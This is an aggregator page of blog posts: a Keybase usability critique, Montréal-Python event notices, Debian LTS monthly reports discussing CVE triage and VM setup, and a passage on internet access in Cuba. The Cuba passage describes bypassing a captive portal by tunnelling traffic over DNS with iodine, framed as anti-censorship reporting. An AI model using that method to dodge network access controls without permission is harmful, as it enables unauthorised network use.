$ keybase status Username: anarcat Logged in: no Device: name: angela ID: 070f6a13f2a66afbb463f49dadfd4518 status: active Keybase keys: unlocked Session: anarcat [salt only] KBFS: status: not running version: log: /home/anarcat/.cache/keybase/keybase.kbfs.log Service: status: running version: 1.0.14-1 log: /home/anarcat/.cache/keybase/keybase.service.log Platform Information: OS: linux Runtime: go1.5.3 Arch: amd64 Client: version: 1.0.14-1 Desktop app: status: not running version: log: /home/anarcat/.cache/keybase/Keybase.app.log Config path: /home/anarcat/.config/keybase/config.json Default user: anarcat Other users: command-line client: keybase status [pid: 14562, version: 1.0.14-1]

So keybase drop "deletes" the key from the keybase client (and presumably the server). One problem here is that we have three different verbs to mean the same thing: in some places, the website says "deleted" (in the web graph), the commandline client uses "drop" and everyone else using PGP in the world uses "revoke". So what is it?

Also note that just dropping that key is not enough to eradicate that key: you still need to generate and import a revocation certificate on GPG's side as well, for that key. This makes sense, because you may have imported that key and you may not want to destroy it when you remove it from keybase, but there could be a little better guessing and UX here as well.

Password usage

Then another problem is that, when you signup on the commandline, it asks you to choose a passphrase. It's not clear at all from the UI what that passphrase is for. Is it to protect the private key material? To login the website? Both? It turns out it is actually to login to the website and the Keybase API. It could also be the key to the private key material, but I haven't quite figured that out yet.

Similarly, the "paper devices" are a little confusing to me as well. The registration process is fairly insistent that I need to write a series of secret words down on a piece of paper and put it my wallet. This is based on the idea that you can use that key to recover your account and setup new devices. However, it is not made clear at all how those credentials should be protected or used. What if I lose my wallet? What do I do then? Is it okay if i write it on the back of my laptop instead? I know it sounds like stupid questions to crypto geek, but it's definitely stuff people will do, and education, at all levels, is necessary here.

The existing web of trust

Finally, I found it surprisingly counter-intuitive to sign keys with keybase. I was assuming the whole point of the thing was to expand the web of trust, but it seems their mission lies somewhere else: there is no facility to sign keys directly in keybase. You sign statements on various social sites (Github, Twitter, Reddit...) but doing traditional key exchanges seems to be off limits.

My obvious use case was to sign my existing key material with my newly generated anarcat@keybase.io key, so that keybase would become another way of verifying my identity. Well, this is not possible with keybase directly - you still have to go through the regular:

gpg --sign-key DEADBEEF

Which is really unfortunate, because some craaaazy people like me insist on doing in person, actually secure key exchanges sometimes, and the tools to do this right now (mainly gpg, caff and monkeysign) really need a lot of love and help. Keybase could have helped a lot in pushing those initiatives forward and bring new ways of doing secure key exchanges, instead of only lowering the standards on cryptographic identity.

Usual proprietary startup rant

I can't help but finish by noticing that the whole basic problem with Keybase is more fundamental than a few usability issues, which can all be fixed fairly easily.

Keybase.IO is a web-based service that is entirely proprietary. The client is freely downloadable and free software - but the server side is not. This makes us rely on a central point of failure and the goodwill of those operators to not only keep the service running (for free?) indefinitely, but to protect us against all attackers, state-run or otherwise.

This is definitely against basic free software principles and the open architecture of the internet federation, well embodied in the Franklin street statement. Online services should be decentralized and open like the OpenPGP keyservers have always been, period.

Conclusion

I am curious to see where Keybase brings us, as a community. So far, I am concerned about centralization and devaluation of the web of trust as cryptographic system. I do not believe that trusting multiple corporate social networking sites bring much benefit to our security, although it does improve usability significantly and is certainly better than TOFU, so that part of the project is definitely interesting, especially since it allows leveraging classical internet protocols like DNS and HTTPS.

Key exchange is a critical problem that still hasn't properly been resolved in the cryptographic community. Most efforts at building communication tools (say like Signal or Telegram) mostly ignore the problem and expect people to read up strings of numbers or rely on synchronous communications (see the Axolotl rachet for Signal's take on it). Keybase's attempts at fixing this are great, but needs much more work to actually resolve the PKI issues in a significant way.

More fundamentally, the practice of storing keys on the servers should just stop: it is a definite no go for me, and a classic crypto mistake that has bitten way too many people. In my mind, it discredits the whole project. The point of OpenPGP is end to end encryption across devices: storing the keys on a server breaks that apart, and doesn't improve much on the existing HTTPS security systems already in place on the web.

It is especially a problem given the new waves of attacks on cryptography from western governments, from the UK to California... Until those issues are resolved, I can't get myself to recommend Keybase to anyone just yet.

Post-scriptum

Note to Keybase developers: I have considered filing issues regarding the above, but unfortunately, I was unable to filter through the gigantic github issues list for duplicates, and didn't have time to file detailed reports for everything. I apologize for bypassing those usual conventions.

If you want to try out Keybase to make your own opinion, I do have 4 invites I can give away, but I will do so only if you need to test specific issues. Otherwise, I note that there is a Request For Package for the Debian package to become official, that Debian developers (or Keybase developers!) may be interested in completing.

Catégories: External Blogs

Montréal-Python 57: Biogeographical Ascent

Montreal Python - lun, 03/07/2016 - 00:00

We're close to a month before the next PyCon Conference in Portland, Oregon. We are organizing our 58th meetup at our lovely UQAM. Join us if you would like to feel what the Python community in Montreal is doing.

As usual we are receiving some guests in both languages and they will present you their projects and realizations.

Don't forget to join us after the meetup at the Benelux to celebrate spring in our lovely city.

Flash presentations

Kate Arthur: Kids CODE Jeunesse

Kids Code Jeunesse is dedicated to giving every Canadian child the chance to learn to code and to learn computational thinking. We introduce educators, parents and communities to intuitive teaching tools.

We work in classrooms, community centres, host events and give workshops to supporting engaging educational experiences for everyone.

http://kidscodejeunesse.org/

Christophe Reverd: Club Framboise

Présentation du Club Framboise, la communauté des utilisateurs de Raspberry Pi à Montréal

http://clubframboise.ca/

Main presentations

Vadim Gubergrits: DIY Quantum Computer

An introduction to Quantum Computing with Python.

Pascal Priori: santropol-feast: Savoir faire Linux et des bénévoles accompagnent le Santropol Roulant

Dans le cadre de la maison du logiciel libre, Savoir faire Linux et des bénévoles accompagnent le Santropol Roulant, un acteur du milieu communautaire montréalais dans la réalisation d'une plateforme de gestion de la base de donnée des clients en Django. En effet, au cœur des activités du Santropol Roulant, il y a le service de popote roulante qui cuisine, prépare et livre plus d’une centaine de repas chauds chaque jour à des personnes en perte d’autonomie. La base de données des clients joue un rôle clé dans la chaîne de services Réalisé en Django, le projet est à la recherche de bénévoles ayant envie de s'engager et contribuer au projet pour poursuivre le développement de la plateforme!

https://github.com/savoirfairelinux/santropol-feast

George Peristerakis: How CI is done in Openstack

In George's last talk, there was a lot of questions on the details of integrating code review and continuous integration in Openstack. This talk is a followup on the process and the technology behind implementing CI for Openstack.

Ivo Tzvetkov: Neolixir

An ORM for easy modelling and integration of Neo4j graph databases

https://github.com/kbremner/neolixir

Where

UQÀM, Pavillion PK

201, Président-Kennedy avenue

Room PK-1140

When

Monday, May 9th 2016

Schedule
  • 6:00pm — Doors open
  • 6:30pm — Presentations start
  • 7:30pm — Break
  • 7:45pm — Second round of presentations
  • 9:00pm — End of the meeting, have a drink with us
We’d like to thank our sponsors for their continued support:
  • UQÀM
  • Bénélux
  • w.illi.am/
  • Outbox
  • Savoir-faire Linux
  • Caravan
  • iWeb
Catégories: External Blogs

ConFoo is coming!

Montreal Python - lun, 02/22/2016 - 00:00

ConFoo, a community conference, one of the most important events for developers. It covers a multitude of programming languages, including Python. There are a total of 155 presentations. Two of them are amazing keynotes about cloud-connected robots and machine ethics. In addition, the innovation night will showcase local entrepreneurs who built fascinating technologies.

ConFoo 2016 will be held on February 24-26 in Montreal. Tickets are currently sold at a discount. There are also many socials that are free and open to the public: https://confoo.ca/en/2016/activities

Here is a preview of what the Python track holds: https://confoo.ca/en/2016/t/python.

Catégories: External Blogs

Montréal-Python 57: Call for speakers

Montreal Python - lun, 02/22/2016 - 00:00

In march, we are getting back to our root and visiting our friends of UQAM. For the occasion, It's an opportunity to come present cause we are looking for speakers for talks of 30, 15 or 5 minutes.

For example, if you are using Python to deploy Docker services, doing Big Data or simply having fun at discovering new tricks that make your life easier, we want you on stage :)

We are also looking for people interested for presenting at module of the month or a module that you love !

To submit your talk, write us at mtlpyteam@googlegroups.com

Where

UQAM, more informations coming soon

When

Monday, March 14th 2016

Schedule
  • 6:00pm — Doors open
  • 6:30pm — Presentations start
  • 7:30pm — Break
  • 7:45pm — Second round of presentations
  • 9:00pm — End of the meeting, have a drink with us
We’d like to thank our sponsors for their continued support:
  • UQÀM
  • Bénélux
  • w.illi.am/
  • Outbox
  • Savoir-faire Linux
  • Caravan
  • iWeb
Catégories: External Blogs

My free software activities, february 2016

Anarcat - mar, 02/16/2016 - 20:43
Debian Long Term Support (LTS)

This is my third month working on Debian LTS, started by Raphael Hertzog at Freexian. This month was my first month working on the frontdesk duty and did a good bunch of triage. I also performed one upload and reviewed a few security issues.

Frontdesk duties

I spent some time trying to get familiar with the frontdesk duty. I still need to document a bit of what I learned, which did involve asking around for parts of the process. The following issues were triaged:

  • roundcube in squeeze was happily not vulnerable to CVE-2015-8794 and CVE-2015-8793, as the code affected was not present. roundcube is also not shipped with jessie but the backport is vulnerable
  • the php-openid vulnerability was actually just a code sample, a bug report comment clarified all of CVE-2016-2049
  • ffmpeg issues were closed, as it is not supported in squeeze
  • libxml2 was marked as needing work (CVE-2016-2073)
  • asterisk was triaged for all distros before i found out it is also unsupported in squeeze (CVEs coming up, AST-2016-001, AST-2016-001, AST-2016-001)
  • libebml and libmatroska were marked as unsupported, although an upload of debian-security-support will be necessary to complete that work (bug #814557 filed)
Uploads and reviews

I only ended up doing one upload, of the chrony package (CVE-2016-1567), thanks to the maintainer which provided the patch.

I tried my best trying to sort through the issues with tiff (CVE-2015-8668 and CVE-2015-7554), which didn't have obvious fixes available. OpenSUSE seem to have patches, but it is really hard to find them through their issue trackers, which were timing out on me. Hopefully someone else can pick that one up.

I also tried and failed to reproduce the cpio issue (CVE-2016-2037), which, at the time, didn't have a patch for a fix. This ended up being solved and Santiago took up the upload.

I finally spent some time trying to untangle the mess that is libraw, or more precisely, all the packages that embed dcraw code instead of linking against libraw. Now I really feel even more strongly for the Debian policy section 4.13 which states that Debian packages should not ship with copies of other packages code. It made it really hard to figure out which packages were vulnerable, especially because it was hard to figure out which versions of libraw/dcraw were actually vulnerable to the bug, but also just plain figure out which packages were copying code from libraw. I wish I had found out about secure-testing/data/embedded-code-copies earlier... Still, it was interesting to get familiar with codesearch.debian.net to try to find copies of the vulnerable code, which was not working so well. Kudos to darktable 2.0 for getting rid of their embedded copy of libraw, by the way - it made it completely not vulnerable to the issue, the versions in stretch and sid not having the code at all and older versions having non-vulnerable copies of the code.

Issues with VMs again

I still had problems running a squeeze VM - not wanting to use virtualbox because of the overhead, I got lost for a bit trying to use libvirt and KVM. A bunch of issues crept up: using virt-manager would just fail on startup with an error saying interface mtu value is improper, which is a very unhelpful error message (what is a proper value??) - and, for the record, the MTU on eth0 and wlan0 is the fairly standard 1500, while lo is at 65536 bytes, nothing unusual there as far as I know.

Then the next problem was actually running a VM - I still somewhat expected to be able to boot off a chroot, something I should definitely forget about it seems like (boot loader missing? not sure). I ended up calling virt-install with the live ISO image I was previously using:

virt-install --virt-type kvm --name squeeze-amd64 --memory 512 --cdrom ~/iso/Debian/cdimage.debian.org_mirror_cdimage_archive_6.0.10_live_amd64_iso_hybrid_debian_live_6.0.10_amd64_gnome_desktop.iso --disk size=4 --os-variant debiansqueeze

At least now I have an installed squeeze VM, something I didn't get to do in Virtualbox (mostly because I didn't want to wait through the install, because it was so slow).

Finally, I still have trouble getting a commandline console on the VM: somehow, running virtsh console squeeze-amd64 doesn't give me a login terminal, and worse, it actually freezes the terminal that I can actually get on virt-viewer squeeze-amd64, which definitely sounds like a bug.

I documented a bit more of that setup in the Debian wiki KVM page so hopefully this will be useful for others.

Other free software work

I continued my work on improving timetracking with ledger in my ledger-timetracking git repository, which now got a place on the new plaintextaccounting.org website, which acts as a portal for ledger-like software projects and documentation.

Darktable 2.0

I had the pleasure of trying the new Darktable 2.0 release, which only recently entered Debian. I built a backport for jessie, which works beautifully: much faster thumbnail rendering, no dropping of history when switching views... The new features are great, but I also appreciate how they are being very conservative in their approach.

Darktable is great software: I may have trouble approaching the results other are having with lightroom and snapseed, but those are proprietary software that I can't use anyways. I also suspect that I just don't have enough of a clue of what I'm doing to get the results I need in Darktable. Maybe with hand-holding, one day, I will surpass the results I get with the JPEGs from my Canon camera. Until then, I turned off RAW exports in my camera to try and control the explosion of disk use I saw since I got that camera:

41M 2004 363M 2005 937M 2006 2,2G 2007 894M 2008 800M 2009 1,8G 2010 1,4G 2011 9,8G 2012 31G 2013 26G 2014 9,8G 2015

The drop in 2015 is mostly due to me taking less pictures in the last year, for some reason...

Markdown mode hacks

I ended up writing some elisp for the markdown mode. It seems I am always writing links like [text](link) which seems more natural at first, but then the formatting looks messier, as paragraph wrapping is all off because of the long URLs. So I always ended up converting those links, which was a painful series of keystrokes.

So I made a macro, and while I'm a it, why not rewrite it as a lisp function. Twice.

Then I was told by the markdown-mode.el developers that they had already fixed that (in the 2.1 version, not in Debian jessie) and that the C-c C-a r key binding actually recognized existing links and conveniently converted them.

I documented my adventures in bug #94, but it seems I wrote this code for nothing else than re-learning Emacs lisp, which was actually quite fun.

More emacs hacking

Another thing I always wasted time doing by and is "rename file and buffer". Often, you visit a file but it's named wrong. My most common case is a .txt file that i rename to .mdwn.

I would then have to do:

M-x rename-file <ret> newfile M-x rename-buffer <ret> newfile C-x C-s <ret> newfile

Really annoying.

Turns out that set-visited-file-name actually does most of the job, but doesn't actually rename the file, which is really silly. So I wrote this small function instead:

(defun rename-file-and-buffer (newfname) "combine rename-file and rename-buffer set-visited-file-name does most of the job, but unfortunately doesn't actually rename the file. rename-file does that, but doesn't rename the buffer. rename-buffer only renames the buffer, which is pretty pointless. only operates on current buffer because set-visited-file-name also does so and we don't bother doing excursions around. " (interactive "GRename file and bufer: ") (let ((oldfname (buffer-file-name))) (set-visited-file-name newfname nil t) (rename-file oldfname newfname) ) )

Not bound to any key, really trivial, but doing this without that function is really non-trivial, especially since set-visited-file-name needs special arguments to not mark the file as modified.

IRC packages updates

I updated the Sopel IRC bot package to the latest release, 6.3.0. They have finally switched to Requests, but apart from that, no change was necessary. I am glad to finally see SNI support working everywhere in the bot!

I also update the Charydbis IRC server package to the latest 3.5.0 stable release. This release is great news, as I was able to remove 5 of the 7 patches I was dragging along the Debian package. The previous Charybdis stable release was over 3 years old, as 3.4.2 was released in (December) 2012!

I spend a good chunk of time making the package reproducible. I filed a bug upstream and eventually made a patch to make it possible to hardcode a build timestamp, which seems to have been the only detectable change in the reproducible build infrastructure. Charybdis had been FTBS for a while in sid now, and the upload should fix that as well. Unfortunately, Charybdis still doesn't build with hardening flags - but hopefully a future update of the package should fix that. It is probably because CFLAGS are not passed around properly.

There's really interesting stuff going on in the IRC world. Even though IRC is one of the oldest protocols still in operation (1988, even before the Web, but after SMTP and the even more venerable FTP), it is still being actively developed, with a working group drafting multiple extensions to the IRCv3 protocol defined in RFC 1459.

For example, IRCv3.3 includes a Strict Transport Security extension, which tries to ensure users use encrypted channels as much as possible, through warnings and STARTTLS support. Charybdis goes even further by proposing a reversal of the +S ("secure channel" flag) where all channels are secure by default, and you need to deliberately mark a channel as insecure with the +U flag if you actually want to allow users on an clear-text connection to join the channel. A transition mechanism is also proposed.

Miscellaneous bug reports

En vrac...

I fell face-first in this amazing game that is endless-sky. I made a small pull request on the documentation, a bug report and a feature request.

I forwarded a bug report, originally filed against monkeysign, to the pyqrencode maintainers.

I filed a usability bug against tails-installer, which just entered Debian, mostly usability issues.

I discovered the fim image viewer, which re-entered Debian recently. It seemed perfect to adjust my photos-import workflow, so I added it to my script, to be able to review photos prior to importing them into Darktable and git-annex.

Catégories: External Blogs

Montréal-Python: Call to Action

Montreal Python - lun, 02/01/2016 - 00:00

Ladies and Gentlemen, we at Montreal Python are super excited for 2016 and we have come up with some great ideas.

In order to turn these ideas into reality, we will need some help. Montreal Python is an open community and collaboration is key to our success. So we are inviting beginners, experts and newcomers to join us at our next organization meeting on Monday February 8th.

Here we will discuss topics about:

  • Annual event / conference
  • Workshops
  • Hackathons / Project nights
  • The future of Montreal Python / elections

Montreal has a pretty exciting Python scene, and thanks to the community that is something we'll maintain for years to come. It is now your chance to come and make things happening.

When

Monday February 8th at 6pm

Where

Shopify Offices 490 rue de la Gauchetière west https://goo.gl/maps/MJrA2RN8e912

Who

Anyone who want to help or is curious about the Python Community in Montreal

For those that can't attend, don't worry, send us a email with your ideas at mtlpyteam@googlegroups.com.

Catégories: External Blogs

My free software activities, January 2016

Anarcat - dim, 01/31/2016 - 17:18
Debian Long Term Support (LTS)

This is my second month working on Debian LTS, started by Raphael Hertzog at Freexian. I think this month has been a little better for me, as I was able to push two "DLA" (Debian LTS Advisories, similar to regular DSAs (Debian Security Advisories) but only applying to LTS releases).

phpMyAdmin and Prosody

I pushed DLAs for phpmyadmin (DLA-406-1) and [prosody (CVE-2016-0756)][]. Both were pretty trivial, but I still had to boot a squeeze VM to test the resulting packages, something that was harder than expected. Still the packages were accepted in squeeze-lts and should work fine.

icu and JDK vulnerabilities

I also spent a good amount of time trying to untangle the mess that java software has become, and in particular the icu vulnerabilities, CVE-2015-4844 and CVE-2016-0494. I ended up being able to backport patches and build packages, not without a significant amount of pain because of how upstream failed to clearly identify which patches did what.

The fact that they (Oracle) did not notify their own upstream (icu) is also a really questionable practice in the free software world, which doesn't come as a surprise coming from Oracle anymore, unfortunately. Even worse, CVE-2016-0494 was actually introduced as part of the fix for CVE-2015-4844. I am not even sure the patches provided actually fix the problem because of course Oracle didn't clearly state what the problem was or how to exploit it.

Still: I did the best I could under the circumstances and built packages which I shared with the debian-lts list in the hope others could test it. I am not much familiar with the icu package or even Java anymore, so I do not feel comfortable uploading those fixes directly right now, especially since I just trust whatever was said on the Redhat and icu bugtrackers. Hopefully someone else can pick this up and confirm I had the right approach.

OpenSSH vulnerabilities

I also worked on CVE-2016-1908 a fairly awkward vulnerability in OpenSSH involving bypassing a security check in the X server that forbids certain clients from looking at keystrokes, selections and more stuff from other clients. The problem is pretty well described in this article. It is, basically, that there are two ways for applications to talk to the X server: "trusted" and "untrusted". If an application is "trusted", they can do all sorts of stuff like manipulate the clipboard, send keystrokes to other applications, sniff keystrokes and so on. This seems fine if you are running local apps (a good example is xdotool to test this) but can be pretty bad once X forwarding comes in play in SSH because then the remote server can use your X credentials to run arbitrary X code in your local X server. In other words, once you forward X, you trust the remote server as being local, more or less.

This is why OpenSSH 3.8 introduced the distinction between -X (untrusted) and -Y (trusted). Unfortunately, after quite a bit of research and work to reproduce the issue (i could not not reproduce the issue!), I realized that Debian has, even since 3.8 has been released (around the "sarge" days!) forcibly defaulted ForwardX11Trusted to yes which makes -X and -Y behave the same way. I described all of this in a post to the LTS list and OpenSSH maintainers and it seems there were good reasons for this back then (-X actually breaks a lot of X clients, for example selecting text will crash xterm), but I still don't quite see why we shouldn't tell people to use -Y consciously if they need to, instead of defaulting to the nasty insecure behavior.

Anyways, this will probably end up being swept under the rug for usability reasons, but just keep in mind that -X can be pretty nasty if you run it against an untrusted server.

Xscreensaver vulnerability

This one was fun. JWZ finally got bitten by his own rants and a pretty embarrassing vulnerability (CVE-2015-8025) that allowed one to crash the login dialog (and unlock the screen) by hot swapping external monitors (!). I worked on trying to reproduce the issue (I couldn't: my HDMI connector stopped working on my laptop, presumably because of a Linux kernel backport) and building the patches provided by the maintainer on wheezy, and pushed debdiffs to the security team which proceeded with the upload.

Other LTS work

I still spend a bit too much time to my taste trying to find work in LTS land. Very often, all the issues are assigned or the ones that remain seem impossible to fix (like the icu vulnerabilities) or packages so big that I am scared to work on it (like eglibc). Still, the last week of work was much better, thanks to the excellent work that Guido Günther has done on the front desk duties this week. My turn is coming up next week and I hope I can do the same for my fellow LTS workers.

Oh, and I tried to reproduce the cpio issue (CVE-2016-2037) and failed, because I didn't know enough about Valgrind. But even then, I don't exactly know where to start to fix that issue. It seems no one does, because this unmaintained package is still not fixed anywhere...

systemd-nspawn adventures

In testing the OpenSSH, phpMyAdmin and prosody issues, I had high hopes that systemd-nspawn would enable me to run an isolated squeeze container reliably. But I had trouble: for some reason, squeeze does not seem to like nspawn at all. First off, it completely refuses to boot it because it doesn't recognize it as an "OS root directory", which, apparently, need the os-release file (in /etc, but it doesn't say that because it would be too easy):

$ sudo systemd-nspawn -b -D /var/cache/pbuilder/squeeze-amd64-vm Directory /home/pbuilder/squeeze-amd64-vm doesn't look like an OS root directory (os-release file is missing). Refusing.

I just created that as an empty file (it works: i also tried copying it from a Jessie system and "faking" the data in it, but it's not necessary), and then nspawn accepts booting it. The next problem is that it just hangs there: it seems that the getty programs can't talk to the nspawn console:

$ sudo systemd-nspawn -b -D /var/cache/pbuilder/squeeze-amd64-vm Spawning container squeeze-amd64-vm on /home/pbuilder/squeeze-amd64-vm. Press ^] three times within 1s to kill container. /etc/localtime is not a symlink, not updating container timezone. INIT: version 2.88 booting Using makefile-style concurrent boot in runlevel S. Setting the system clock. Cannot access the Hardware Clock via any known method. Use the --debug option to see the details of our search for an access method. Unable to set System Clock to: Sun Jan 31 15:57:31 UTC 2016 ... (warning). Activating swap...done. Setting the system clock. Cannot access the Hardware Clock via any known method. Use the --debug option to see the details of our search for an access method. Unable to set System Clock to: Sun Jan 31 15:57:31 UTC 2016 ... (warning). Activating lvm and md swap...done. Checking file systems...fsck from util-linux-ng 2.17.2 done. Mounting local filesystems...done. Activating swapfile swap...done. Cleaning up temporary files.... Cleaning up temporary files.... INIT: Entering runlevel: 2 Using makefile-style concurrent boot in runlevel 2. INIT: Id "2" respawning too fast: disabled for 5 minutes INIT: Id "1" respawning too fast: disabled for 5 minutes INIT: Id "3" respawning too fast: disabled for 5 minutes INIT: Id "4" respawning too fast: disabled for 5 minutes INIT: Id "5" respawning too fast: disabled for 5 minutes INIT: Id "6" respawning too fast: disabled for 5 minutes INIT: no more processes left in this runlevel

Note that before the INIT messages show up, quite a bit of time passes, around a minute or two. And then the container is just stuck there: no login prompt, no nothing. Turning off the VM is also difficult:

$ sudo machinectl list MACHINE CONTAINER SERVICE squeeze-amd64-vm container nspawn 1 machines listed. $ sudo machinectl status squeeze-amd64-vm squeeze-amd64-vm Since: dim 2016-01-31 10:57:31 EST; 4min 44s ago Leader: 3983 (init) Service: nspawn; class container Root: /home/pbuilder/squeeze-amd64-vm Address: fe80::ee55:f9ff:fec5:f255 2001:1928:1:9:ee55:f9ff:fec5:f255 fe80::ea9a:8fff:fe6e:f60 2001:1928:1:9:ea9a:8fff:fe6e:f60 192.168.0.166 Unit: machine-squeeze\x2damd64\x2dvm.scope ├─3983 init [2] └─4204 lua /usr/bin/prosody $ sudo machinectl poweroff squeeze-amd64-vm # does nothing $ sudo machinectl terminate squeeze-amd64-vm # also does nothing $ sudo kill 3983 # does nothing $ sudo kill -9 3983 $

So only the latter kill -9 worked:

Container squeeze-amd64-vm terminated by signal KILL.

Pretty annoying! So I ended up doing all my tests in a chroot, which involved shutting down the web server on my laptop (for phpmyadmin) and removing policy-rc.d to allow the services to start in the chroot. That worked, but I would prefer to run that code in a container. I'd be happy to hear how other maintainers are handling this kind of stuff.

For the OpenSSH vulnerability testing, I also wanted to have a X server running from squeeze, something which I found surprisingly hard. I was not able to figure out how to make [qemu][] boot from a directory (the above chroot), so I turned to the Squeeze live images from the cdimage archive. Qemu, for some reason, was not able to boot those either: I would only get a grey screen. So I ended up installing Virtualbox, which worked perfectly, but I'd love to hear how I could handle this better as well.

Other free software work

As usual, I did tons more stuff on the computer this month. Way more than I should, actually. I am trying to take some time to reflect upon my work and life these days, and the computer is more part of the problem than the solution, so those feel like a vice that I can't get rid of more than an accomplishment. Still, you might be interested to know about those, so here they are.

Ledger timetracking

I am tracking the time I work on various issues through the overwhelming org-mode in Emacs. The rationale I had was that I didn't want to bother writing yet another time tracker, having written at least two before. One is the old phpTimeTracker, the other is a rewrite that never got anywhere, and finally, I had to deal with the formidable kProject during my time at Koumbit.org. All of those made me totally allergic to project trackers, timetrackers, and reinventing the wheel, so I figured it made sense to use an already existing solution.

Plus, org-mode allows me to track todos in a fairly meaningful way and I can punch into todo items fairly transparently. I also had a hunch I could bridge this with ledger, a lightweight accounting tool I started using recently. I was previously using the heavier Gnucash, almost a decade ago - but I really was seduced by the idea of a commandline tool that stores its data in a flat file that I can checkin to git.

How wrong I was! First off, ledger can't read org files out of the box. It's weird, but you need to convert those files into timeclock.el formatted files, which, oddly enough, is a completely different file format, and completely different timetracker. Interestingly, it's a very interesting format. An example:

i 1970-01-01 12:00:00 project test 4h o 1970-01-01 16:00:00

... which makes it possible to write a timetracker with two simple shell aliases:

export TIMELOG=$HOME/.timelog alias ti="echo i `date '+%Y-%m-%d %H:%M:%S'` \$* >>$TIMELOG" alias to="echo o `date '+%Y-%m-%d %H:%M:%S'` >>$TIMELOG"

How's that for simplicity!

So you use John Wiegley's org2tc (or my fork which adds a few improvements) to convert from org to timeclock.el. From there on, a bunch of tools can do reporting on those files, the most interesting being obviously ledger itself, as it can read those files natively (although hledger has trouble including them). So far so good: I can do time tracking very easily and report on my time now!

Now, to turn this into bills and actual accounting, well... it's really much more complicated. To make a long story short, it works, but I really had to pull my hair out and ended up making yet another git repository to demonstrate how that could work. I am now stuck at the actual step of generating bills more automatically, which seems to be a total pain. Previous examples and documentation I found were limited and while I feel that some people are actively doing this, they still have to reveal their magic sauce in a meaningful way. I was told on IRC no one actually achieved converting timeclock.el entries directly into bills...

Kodi

I have done a small patch to the rom collection browser to turn off an annoying "OK" dialog that would block import of ROMs. This actually was way more involved than expected, considering the size of the patch: I had to export the project to Github since the original repository at Google Code is now archived, just like all Google Code repositories. I hope someone will pick it up from there

Sopel

I have finally got my small patch for SNI support in Sopel! It turns out they are phasing out their own web module in favor of Requests, something that was refused last year. It seems the Sopel developers finally saw the interest in avoiding the maintenance cost of their own complete HTTP library... in an IRC bot.

Working on this patch, I filed a bug in requests which was promptly fixed.

Feed2tweet and spigot

I already mentioned how I linked this blog to Twitter through the use of feed2tweet. Since then, part of my pull requests and issues were merged and others are still pending.

In the meantime, I figured it would make sense to also post to identi.ca. This turned out to be surprisingly more difficult - the only bridge available would not work very well for me. I also filed a bunch of issues in the hope things would stabilize, but so far I have not made this work properly.

It seems to me that all of this stuff is really just reinventing the wheel. There are pretty neat IM libraries out there, one that is actively developed is libturpial, used in the Turpial client. It currently only supports status.net and Twitter, but if Pump.io support is implemented, it would all of the above problems at once...

Git-mediawiki

Did I mention how awesome the git-mediawiki remote is? It allows me to clone Mediawiki wikis and transparently read and write to them using usual git commands! I use it to keep a mirror of the amateur radio wiki site, for example, as it makes no sense to me to not have this site available offline. I was trying to mirror Wikivoyage and it would block at 500 pages, so I made a patch to support larger wikis.

Borg resignation

Finally, it is with great sadness that I announce that I have left the Borg backup project. It seems that my views of release and project management are irreconcilable with those of the maintainer of the Attic fork. Those looking for more details and explanations are welcome to look in the issue tracker for the various discussions regarding i18n, the support timeframe and compatibility policy, or to contact me personally.

Catégories: External Blogs

Internet in Cuba

Anarcat - lun, 01/25/2016 - 14:50

A lot has been written about the Internet in Cuba over the years. I have read a few articles, from New York Times' happy support for Google's invasion of Cuba to RSF's dramatic and fairly outdated report about censorship in Cuba. Having written before about Internet censorship in Tunisia, I was curious to see if I could get a feel of what it is like over there, now that a new Castro is in power and the Obama administration has started restoring diplomatic ties with Cuba. With those political changes coming signifying the end of an embargo that has been called genocidal by the Cuban government, it is surprisingly difficult to get fresh information about the current state of affairs.

This article aims to fill that gap in clarifying how the internet works in Cuba, what kind of censorship mechanisms are in place and how to work around them. It also digs more technically into the network architecture and performance. It is published in the hope of providing both Cubans and the rest of the world with a better understanding of their network and, if possible, Cubans ways to access the internet more cheaply or without censorship.

"Censorship" and workarounds

Unfortunately, I have been connected to the internet only through the the Varadero airport and the WiFi of a "full included" resort near Jibacoa. I have to come to assume that this network is likely to be on a segregated, uncensored internet while the rest of the country suffers the wrath of the Internet censorship in Cuba I have seen documented elsewhere.

Through my research, I couldn't find any sort of direct censorship. The Netalyzr tool couldn't find anything significantly wrong with the connection, other than the obvious performance problems related both to the overloaded uplinks of the Cuban internet. I ran an incomplete OONI probe as well, and it seems there was no obvious censorship detected there as well, at least according to folks in the helpful #ooni IRC channel. Tor also works fine, and could be a great way to avoid the global surveillance system described later in this article.

Nevertheless, it still remains to be seen how the internet is censored in the "real" Cuban internet, outside of the tourist designated areas - hopefully future visitors or locals can expand on this using the tools mentioned above, using the regular internet.

Usual care should be taken when using any workaround tools, mentioned in this post or not, as different regimes over the world have accused, detained, tortured and killed sometimes for the mere fact of using or distributing circumvention tools. For example, a Russian developer was arrested and detained in 2001 by United States' FBI for exposing vulnerabilities in the Adobe e-books copy protection mechanisms. Similarly, people distributing Tor and other tools have been arrested during the period prior to the revolution in Tunisia.

The Cuban captive portal

There is, however, a more pernicious and yet very obvious censorship mechanism at work in Cuba: to get access to the internet, you have to go through what seems to be a state-wide captive portal, which I have seen both at the hotel and the airport. It is presumably deployed at all levels of the internet access points.

To get credentials through that portal, you need a username and password which you get by buying a Nauta card. Those cards cost 2$CUC and get you an hour of basically unlimited internet access. That may not seem like a lot for a rich northern hotel party-goer, but for Cubans, it's a lot of money, given that the average monthly salary is around 20$CUC. The system is also pretty annoying to use, because it means you do not get continuous network access: every hour, you need to input a new card, which will obviously make streaming movies and other online activities annoying. It also makes hosting servers basically impossible.

So while Cuba does not have, like China or Iran, a "great firewall", there is definitely a big restriction to going online in Cuba. Indeed, it seems to be how the government ensures that Cubans do not foment too much dissent online: keep the internet slow and inaccessible, and you won't get too many Arab spring / blogger revolutions.

Bypassing the Cuban captive portal

The good news is that it is perfectly possible for Cubans (or at least for a tourist like me with resources outside of the country) to bypass the captive portal. Like many poorly implemented portals, the portal allows DNS traffic to go through, which makes it possible to access the global network for free by using a tool like iodine which tunnels IP traffic over DNS requests.

Of course, the bandwidth and reliability of the connection you get through such a portal is pretty bad. I have regularly seen 80% packet loss and over two minutes of latency:

--- 10.0.0.1 ping statistics --- 163 packets transmitted, 31 received, 80% packet loss, time 162391ms rtt min/avg/max/mdev = 133.700/2669.535/64188.027/11257.336 ms, pipe 65

Still, it allowed me to login to my home server through SSH using Mosh to workaround the reliability issues.

Every once in a while, mosh would get stuck and keep on trying to send packets to probe the server, which would clog the connection even more. So I regularly had to restart the whole stack using these commands:

